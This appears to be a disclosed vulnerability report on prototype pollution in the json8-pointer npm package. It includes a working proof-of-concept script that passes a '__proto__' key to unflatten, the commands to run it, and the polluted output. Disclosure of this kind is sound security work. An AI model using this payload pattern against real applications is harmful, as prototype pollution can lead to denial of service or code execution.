Prototype Pollution in sonnyp/json8
Valid
Reported on
Oct 22nd 2020
Description
json8-pointer
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
var json8Pointer = require("json8-pointer")
json8Pointer.unflatten({"": {},"/firstName": "John", "/__proto__/polluted": "Yes! Its Polluted"});
console.log({}.polluted);
- Execute the following commands in another terminal:
npm i json8-pointer # Install affected module
node poc.js # Run the PoC
- Check the Output:
Yes! Its Polluted
Occurrences
to join this conversation